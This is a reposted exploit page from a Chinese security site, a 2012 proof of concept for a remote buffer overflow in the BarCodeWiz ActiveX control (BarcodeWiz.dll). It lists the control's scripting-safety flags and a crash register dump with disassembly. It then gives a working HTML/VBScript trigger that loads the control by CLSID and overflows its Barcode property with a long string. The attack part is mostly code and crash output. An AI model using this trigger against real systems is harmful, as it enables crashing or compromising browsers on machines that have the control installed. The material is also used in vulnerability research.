首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 BarcodeWiz.dll remote Buffer Overflow PoC 来源：Https://twitter.com/coolkaveh 作者：coolkaveh 发布时间：2012-07-27   Exploit Title: BarCodeWiz Barcode ActiveX(BarcodeWiz.dll) remote Buffer Overflow PoC Date: July 25, 2012 Author: coolkaveh coolkaveh@rocketmail.com Https://twitter.com/coolkaveh Vendor Homepage: http://barcodewiz.com/ Version: 4.0.0.0 Tested on: windows 7 SP2 awesome coolkaveh ========================================================================== Class BarCodeWiz GUID: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6} Number of Interfaces: 1 Default Interface: IWiz RegKey Safe for Script: True RegkeySafe for Init: True KillBitSet: False Report for Clsid: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6} RegKey Safe for Script: True RegKey Safe for Init: True Implements IObjectSafety: True IDisp Safe:  Safe for untrusted: caller,data  IPersist Safe:  Safe for untrusted: caller,data  IPStorage Safe:  Safe for untrusted: caller,data  -------------------------------------------------------------------------- Registers: -------------------------------------------------------------------------- EIP 023F8D42 EAX 00000021 EBX 00000ADD ECX 025A2F58 -> 02439F8C EDX 00000001 EDI 0046D48C -> 00000068 ESI 025A2F58 -> 02439F8C EBP 0046D47C -> 0046E48C ESP 0046D464 -> 025A0AA8 Block Disassembly: ---------------------------------------------------------------------------- 23F8D33 INC EBX 23F8D34 MOV [EBP+8],ECX 23F8D37 PUSH ECX 23F8D38 PUSH DWORD PTR [EBP-8] 23F8D3B MOV ECX,ESI 23F8D3D CALL 023F837E 23F8D42 MOV [EDI+EBX*4],EAX   <--- CRASH 23F8D45 INC EBX 23F8D46 DEC DWORD PTR [EBP-4] 23F8D49 MOV EAX,[EBP-4] 23F8D4C CMP EAX,[EBP-C] 23F8D4F JL 023F8C80 23F8D55 JMP 023F8ECE 23F8D5A MOV EAX,[ESI] 23F8D5C PUSH EBX ArgDump: -------------------------------------------------- EBP+8 00000006 EBP+12 025A2F58 -> 02439F8C EBP+16 00000068 EBP+20 00000021 EBP+24 00000021 EBP+28 00000021 ============================================================================ <html> Exploit <object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='poc' /></object> <script language='vbscript'> targetFile = "C:\Program Files (x86)\BarCodeWiz ActiveX Trial\DLL\BarcodeWiz.dll" prototype  = "Property Let Barcode As String" memberName = "Barcode" progid     = "BARCODEWIZLib.BarCodeWiz" argCount   = 1 arg1=String(14356, "A") poc.Barcode = arg1 </script>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Photodex ProShow Producer 5.0. ·linux/x86 - ASLR deactivation ·Linux x86 chmod 666 /etc/passw ·CuteFlow 2.11.2 Arbitrary File ·Linux x86 execve("/bin/sh") - ·Cisco Linksys PlayerPT ActiveX ·Symantec Web Gateway 5.0.3.18 ·Symantec Web Gateway 5.0.2.18 ·Zabbix 2.0.1 and Earlier Sessi ·Mini-stream RM-MP3 Converter 3 ·httpdx <= 1.5.4 Remote Heap Ov ·Symantec Web Gateway 5.0.3.18   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved